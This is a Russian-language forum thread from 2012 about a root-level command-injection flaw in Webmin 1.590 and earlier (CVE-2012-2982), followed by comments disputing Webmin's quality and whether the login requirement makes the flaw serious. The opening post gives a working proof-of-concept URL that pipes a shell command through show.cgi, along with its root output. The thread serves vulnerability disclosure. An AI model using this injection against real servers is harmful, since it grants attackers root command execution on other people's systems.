Эпичная уязвимость в Webmin <=1.590

1

1

RCE with root rights (with any account, root or non-root, you must be log in) :

https://site:10000/file/show.cgi/bin/48566|id|

uid=0(root) gid=0(root) groups=0(root)

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2982

Ссылка

←	GreenSql и аналоги для предотвращения sql injection

Чашка с кофе снова дала трещину

→

Вот за подобное его из дебиана и выкинули. Кто вообще пользуется этой поделкой и зачем?

leave ★★★★★
(25.09.12 01:47:10 MSK)

Ответ на: комментарий от leave 25.09.12 01:47:10 MSK

дебиана

напомнить историю с openssl?

~~xtraeft~~ ★★☆☆
(25.09.12 01:49:32 MSK) автор топика

Ответ на: комментарий от xtraeft 25.09.12 01:49:32 MSK

Ты сейчас путаешь косяк мейнтейнера и defective by design приблуду, которую не ломал только ленивый.

leave ★★★★★
(25.09.12 01:50:55 MSK)

Ответ на: комментарий от leave 25.09.12 01:50:55 MSK

да, я некорректно выразился
проехали

~~xtraeft~~ ★★☆☆
(25.09.12 01:57:26 MSK) автор топика

Ссылка

you must be log in

Учитывая это - уязвимость вообще никакая.

Разве кто то его использует не для своих личных серваков?

winddos ★★★
(25.09.12 18:23:42 MSK)

Ответ на: комментарий от winddos 25.09.12 18:23:42 MSK

меня сама уязвимость через пайп порадовала

~~xtraeft~~ ★★☆☆
(25.09.12 19:02:16 MSK) автор топика

Ссылка

Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.

←	GreenSql и аналоги для предотвращения sql injection

Security

Чашка с кофе снова дала трещину

→

Похожие темы